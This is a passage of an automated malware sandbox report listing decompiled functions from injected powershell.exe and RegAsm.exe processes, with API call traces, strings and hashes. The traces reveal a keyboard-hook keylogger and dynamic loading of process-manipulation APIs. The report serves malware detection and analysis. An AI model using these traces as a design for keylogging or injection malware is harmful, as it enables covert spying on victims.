Instruction Fuzzy Hash: 1641BDB4D002189FCF10CFA9D884AEEFBB5AB49314F14802AE418B7240D778A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002684E8 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 00268566

Memory Dump Source

Source File: 00000008.00000002.382007162.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 50e8003f0d849efd6e3e4b451e887b9a1ba7bda0468ee93846f3b55d3f96d43a
Instruction ID: b2a9327b3c683ac487b079d4a867178571d99e4509085ea8d528e988d67ddd74
Opcode Fuzzy Hash: 50e8003f0d849efd6e3e4b451e887b9a1ba7bda0468ee93846f3b55d3f96d43a
Instruction Fuzzy Hash: 5C31CBB4D102189FCF10CFA9E984AEEFBB5AF49314F24942AE815B7340C735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001AD006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.381940831.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6511c26bb0262b3d1d01176c5785a2ba7143eea98c17f4d1a15dc097822a54d7
Instruction ID: 17bd52ba78b239faf9d88ed4fe18c9842d76e81e892c4c2ede3a979682ecd23f
Opcode Fuzzy Hash: 6511c26bb0262b3d1d01176c5785a2ba7143eea98c17f4d1a15dc097822a54d7
Instruction Fuzzy Hash: 1B01CC6140C3C09FD7134B259C98762BFA4EF03224F1984CBE8848F6A3C2689C49C772

Uniqueness

Uniqueness Score: -1.00%

Function 001AD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.381940831.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c21a3e114fc891f473a3ff5a6a35500b0cdaa8ce343a54f5942ba1b5991bfc8
Instruction ID: 1697446bbd9de4c4995a64508d8363201a0b9e9362d0abb78ff9114454736fb3
Opcode Fuzzy Hash: 3c21a3e114fc891f473a3ff5a6a35500b0cdaa8ce343a54f5942ba1b5991bfc8
Instruction Fuzzy Hash: 3E01F775404740AAE7114E25E9C4B6BBFD8EF42724F28841AFC464B686C779D845C6B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003D1AE8 Relevance: 7.7, Strings: 6, Instructions: 202COMMON

Download Yara Rule

Strings

$p, xrefs: 003D1BA1
$p, xrefs: 003D1B95
$p, xrefs: 003D1B83
$p, xrefs: 003D1B77
$p, xrefs: 003D1B5B
$p, xrefs: 003D1B3F

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p
API String ID: 0-3402276426
Opcode ID: 37dbe56aa74185d78d88296bf3d73aa028d16cb8ceee005b8ae76778dde5994b
Instruction ID: 481b813f224feeebb7e7a8aa89381e15bcf613d03f0110706a5b149265579286
Opcode Fuzzy Hash: 37dbe56aa74185d78d88296bf3d73aa028d16cb8ceee005b8ae76778dde5994b
Instruction Fuzzy Hash: 48514532B04301AFDB265A69A84077AFBE6AFC5310F29847BE855CB381DB71DD41C761

Uniqueness

Uniqueness Score: -1.00%

Function 003D00BA Relevance: 7.7, Strings: 6, Instructions: 166COMMON

Download Yara Rule

Strings

(:., xrefs: 003D0189
L4p, xrefs: 003D01C9
L4p, xrefs: 003D0160
(:., xrefs: 003D0240
L4p, xrefs: 003D01BE
(:., xrefs: 003D011B

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: (:.$(:.$(:.$L4p$L4p$L4p
API String ID: 0-4035427031
Opcode ID: 6cb84ecf5828a91991da62769ec943275d4d3bce55443473e5e88c48e5852d53
Instruction ID: 53599b1b5699afbdea8d66e363febb1d817f788f50783cbaeee0b5edb67870f9
Opcode Fuzzy Hash: 6cb84ecf5828a91991da62769ec943275d4d3bce55443473e5e88c48e5852d53
Instruction Fuzzy Hash: 45515736B00204EFCB1E8E68E8547BE7BA6AF85710F648437E9558B391CBB1CD81C751

Uniqueness

Uniqueness Score: -1.00%

Function 003D030A Relevance: 7.7, Strings: 6, Instructions: 166COMMON

Download Yara Rule

Strings

L:., xrefs: 003D0490
L4p, xrefs: 003D0419
L:., xrefs: 003D03D9
L:., xrefs: 003D036B
L4p, xrefs: 003D040E
L4p, xrefs: 003D03B0

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: L4p$L4p$L4p$L:.$L:.$L:.
API String ID: 0-379486283
Opcode ID: 98efc2b60ada67c409bf4741de9db91d670aeeda455189be09214525e9d31266
Instruction ID: cd1e6ce83ec6b1f6a765cd5e16150256470c10a11b918839bb10d6cb2f2bdd38
Opcode Fuzzy Hash: 98efc2b60ada67c409bf4741de9db91d670aeeda455189be09214525e9d31266
Instruction Fuzzy Hash: 0A512636700204EFCB1E9E69E454BBE7BA6AF84710F198037EA558B391DB71CD81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003D22C0 Relevance: 6.4, Strings: 5, Instructions: 130COMMON

Download Yara Rule

Strings

4'p, xrefs: 003D23BA
$p, xrefs: 003D22F7
4'p, xrefs: 003D23AE
$p, xrefs: 003D235C
$p, xrefs: 003D2350

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$$p$$p$$p
API String ID: 0-2334450948
Opcode ID: 629e5d845a033b9448f4a4b7ec681483410924370321c0cc00c81b88ffbab65c
Instruction ID: ae01ac767e870b8dc86625eeff4cd7166f021cba3fa715bfff14a04f96ceea88
Opcode Fuzzy Hash: 629e5d845a033b9448f4a4b7ec681483410924370321c0cc00c81b88ffbab65c
Instruction Fuzzy Hash: 3B41243B700201DFCB2B4E69A40026BFBA5AFE5310B69847BEC648B391DB79CD55C721

Uniqueness

Uniqueness Score: -1.00%

Function 003D071A Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

4'p, xrefs: 003D0783
4'p, xrefs: 003D078F
$p, xrefs: 003D076E
$p, xrefs: 003D0762

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$$p$$p
API String ID: 0-377911355
Opcode ID: b3030a5fd47d79cca7ab5aad1922b8b62c211342809ffdd73604ae3c24ad32a3
Instruction ID: 092b3e47e50daa87e9a499a1fff4bbd45b1d9f89427fc6e08eb4104f6fb5981f
Opcode Fuzzy Hash: b3030a5fd47d79cca7ab5aad1922b8b62c211342809ffdd73604ae3c24ad32a3
Instruction Fuzzy Hash: 6301A226B093811FC32F026828203A9AF565BD2660FAA46ABD091CF397D9548C82C792

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3432, Parent PID: 3272COMMON

Executed Functions

Function 001ED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.379027656.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55d5f1031c6058685381fdc2b08be33560232d3f3d4adf92ab64d8b872b8eb64
Instruction ID: 6d94b244f37ed6f2c85940da3eaf30e205d8959aec7e4ad722e3d50e19bcfd89
Opcode Fuzzy Hash: 55d5f1031c6058685381fdc2b08be33560232d3f3d4adf92ab64d8b872b8eb64
Instruction Fuzzy Hash: 5D01A771504780AAE7105E16E884B6BFFD8EF41764F2C841AFC494B286C779DC45C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 001ED006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.379027656.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e8886f74949f15e80e20285fcb2326d4b9d811f0bf79613515c0d3349f4f7c
Instruction ID: 14988aaea71cf210cac8261bf93db5c446e05f26cf8916c97dc5c29b19044bd0
Opcode Fuzzy Hash: a1e8886f74949f15e80e20285fcb2326d4b9d811f0bf79613515c0d3349f4f7c
Instruction Fuzzy Hash: 05012D6140E7C05FD7124B259C94B66BFB4DF43224F1D81DBE8888F1A7C2699C48C772

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 3540, Parent PID: 3272COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	1696
Total number of Limit Nodes:	67

Executed Functions

Function 0041CA9E Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi), ref: 0041CAB3
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CABC
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAD3
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CAD6
LoadLibraryA.KERNEL32(shcore), ref: 0041CAE8
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CAEB
LoadLibraryA.KERNEL32(user32), ref: 0041CAFC
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CAFF
LoadLibraryA.KERNEL32(ntdll), ref: 0041CB11
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB14
LoadLibraryA.KERNEL32(kernel32), ref: 0041CB20
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB23
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E92F), ref: 0041CB34
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB37
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E92F), ref: 0041CB48
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB4B
LoadLibraryA.KERNEL32(Shell32), ref: 0041CB5C
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB5F
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E92F), ref: 0041CB70
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB73
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E92F), ref: 0041CB84
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB87
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E92F), ref: 0041CB98
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB9B
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E92F), ref: 0041CBAC
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CBAF
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E92F), ref: 0041CBC0
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CBC3
LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CBD1
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CBD4
LoadLibraryA.KERNEL32(kernel32), ref: 0041CBE5
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CBE8
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E92F), ref: 0041CBF5
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CBF8
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E92F), ref: 0041CC05
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC08
LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CC1A
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC1D
LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CC2A
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC2D
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E92F), ref: 0041CC3E
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC41
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E92F), ref: 0041CC52
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC55
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CC67
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC6A
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CC77
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC7A
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CC87
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC8A
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CC97
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CC9A

Strings

EnumDisplayDevicesW, xrefs: 0041CB75
Psapi, xrefs: 0041CAAE
GetComputerNameExW, xrefs: 0041CB39
RmEndSession, xrefs: 0041CC8C
Kernel32, xrefs: 0041CACE
SetProcessDpiAwareness, xrefs: 0041CADD, 0041CAE2, 0041CAF6
GetConsoleWindow, xrefs: 0041CBD6
IsWow64Process, xrefs: 0041CB25
GetSystemTimes, xrefs: 0041CBB1
shcore, xrefs: 0041CAE3
GetExtendedUdpTable, xrefs: 0041CC1F
Shlwapi, xrefs: 0041CBC7
ntdll, xrefs: 0041CB0B, 0041CB10, 0041CBEF, 0041CBFF, 0041CC34
Shell32, xrefs: 0041CB52
NtSuspendProcess, xrefs: 0041CBEA
user32, xrefs: 0041CAF7, 0041CB7A, 0041CB8E, 0041CBA2
GetExtendedTcpTable, xrefs: 0041CC0A
RmRegisterResources, xrefs: 0041CC6C
NtUnmapViewOfSection, xrefs: 0041CB06
RmGetList, xrefs: 0041CC7C
NtQueryInformationProcess, xrefs: 0041CC2F
RmStartSession, xrefs: 0041CC57
Iphlpapi, xrefs: 0041CC0F, 0041CC19, 0041CC24
GetProcessImageFileNameW, xrefs: 0041CAA8, 0041CAAD, 0041CACD
IsUserAnAdmin, xrefs: 0041CB4D
EnumDisplayMonitors, xrefs: 0041CB89
GlobalMemoryStatusEx, xrefs: 0041CB16
SetProcessDEPPolicy, xrefs: 0041CB61
kernel32, xrefs: 0041CB1B, 0041CB2A, 0041CB3E, 0041CB66, 0041CBB6, 0041CBDB, 0041CC48
GetMonitorInfoW, xrefs: 0041CB9D
NtResumeProcess, xrefs: 0041CBFA
GetFinalPathNameByHandleW, xrefs: 0041CC43
Rstrtmgr, xrefs: 0041CC5C, 0041CC66, 0041CC71, 0041CC81, 0041CC91

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 2b824bf11641892101ffcf30fc9d4a2e3bc4459fb66bd3e79e5053c137ea286e
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: A741BEA0EC035879DA10BBB66CCDE3B3E5CD9857953214837B15CA3150EBBCD8408EAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

GetMessageA.USER32 ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32 ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 3df408a81acfbebc480de00894adf9834a2d8d6a6c4bdcba1a831ec92b492a0d
Instruction ID: c0c8f532641fd7815ca2cfbe9b0d0a2c8afefb59d963ff424aa3b2ebad638a5d
Opcode Fuzzy Hash: 3df408a81acfbebc480de00894adf9834a2d8d6a6c4bdcba1a831ec92b492a0d
Instruction Fuzzy Hash: F1118F32514301ABCB107B769C0986B76ECEA95716B10457EFC85D21D1EA78C910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3E0 Relevance: 9.1, APIs: 6, Instructions: 54
keyboardthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0040A414
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A41F
GetKeyboardLayout.USER32 ref: 0040A426
GetKeyState.USER32(00000010), ref: 0040A430
GetKeyboardState.USER32(?), ref: 0040A43D
ToUnicodeEx.USER32 ref: 0040A459

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 844ac67e9bb01e022d5e1c3247d2b7046eb1d2e1975d077ec3cb4ec24acbdb08
Instruction ID: 281ffdbf1a9a39d400c3d2c64feb854b52b7ec9ef9c1b09e5e6af93a0c8d5dc5
Opcode Fuzzy Hash: 844ac67e9bb01e022d5e1c3247d2b7046eb1d2e1975d077ec3cb4ec24acbdb08
Instruction Fuzzy Hash: 89110C72900218FBDB109BA4ED49FDA7BBCEB4C715F000465FA04E6191D675EE54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6F5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413497: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004134B7
Part of subcall function 00413497: RegQueryValueExA.KERNEL32 ref: 004134D5
Part of subcall function 00413497: RegCloseKey.KERNEL32(?), ref: 004134E0

Sleep.KERNEL32(00000BB8), ref: 0040F7A9
ExitProcess.KERNEL32 ref: 0040F818

Strings

pth_unenc, xrefs: 0040F70B, 0040F752, 0040F7BF
override, xrefs: 0040F71A
4.9.2 Pro, xrefs: 0040F784, 0040F7F1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 4.9.2 Pro$override$pth_unenc
API String ID: 2281282204-2269537927
Opcode ID: 526386a5971bd846982cde3965be0c77047b6b2aa5e75e5edc2e9900d62c132d
Instruction ID: 52d9c995ea664f7604ce00e7e8ce505d170626c6ddf5349e6a99aaaa1312c2d2
Opcode Fuzzy Hash: 526386a5971bd846982cde3965be0c77047b6b2aa5e75e5edc2e9900d62c132d
Instruction Fuzzy Hash: 6C210271B0430167C614BA7A8C5BAAE39999B81718F50003FF40A676D7EF7C8E0483AF

Uniqueness

Uniqueness Score: -1.00%

Function 00433785 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,0043340D,00000034,?,?,005F9EA8), ref: 00433797
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004334A0,00000000,?,00000000), ref: 004337AD
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004334A0,00000000,?,00000000,0041E19F), ref: 004337BF

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: d57451560084938dac3e894a0bfac24fee6c04dd763756b664d54862db7b60e1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: F7E09AB1208310FEFB300F21EC08F673AA4EB89F72F204A3AF651E41E4D7668901861D

Uniqueness

Uniqueness Score: -1.00%

Function 00448817 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0043A9F7), ref: 00448856

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00448832

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: 61bd923b6b31fe67e25aa24f33974494cd0f4c47b3697a25c9b891d55fe5d72b
Instruction ID: 75be75307587ae50968fe44068a21d7488520ef1cd52c70646194855bc40276d
Opcode Fuzzy Hash: 61bd923b6b31fe67e25aa24f33974494cd0f4c47b3697a25c9b891d55fe5d72b
Instruction Fuzzy Hash: 6BE0E531A41718E7D710AF259C02E7EBB90DF44B03B54017EFC0957242DE295D0496DE

Uniqueness

Uniqueness Score: -1.00%

Function 0041B55B Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,0040F171), ref: 0041B590

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9167295f8432bcd57fb576626eea4e25c386a7a518f3d3aa5e9611e2b6c4d6a9
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 9167295f8432bcd57fb576626eea4e25c386a7a518f3d3aa5e9611e2b6c4d6a9
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00434A95 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00434A9A

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 14e8cb0cbb81bd441872974e3896e3a58f7002f9ff1e7d34040d74437857d637
Instruction ID: bededb24876f54f8b14d1792734d10542b4b71307cd25d94af771e4df3ea9f72
Opcode Fuzzy Hash: 14e8cb0cbb81bd441872974e3896e3a58f7002f9ff1e7d34040d74437857d637
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040E913 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Psapi), ref: 0041CAB3
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CABC
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAD3
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CAD6
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(shcore), ref: 0041CAE8
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CAEB
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(user32), ref: 0041CAFC
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CAFF
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(ntdll), ref: 0041CB11
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB14
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(kernel32), ref: 0041CB20
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB23
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E92F), ref: 0041CB34
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB37
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E92F), ref: 0041CB48
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB4B
Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Shell32), ref: 0041CB5C
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB5F
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E92F), ref: 0041CB70
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB73
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E92F), ref: 0041CB84
Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E92F), ref: 0041CB87
Part of subcall function 0041CA9E: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E92F), ref: 0041CB98
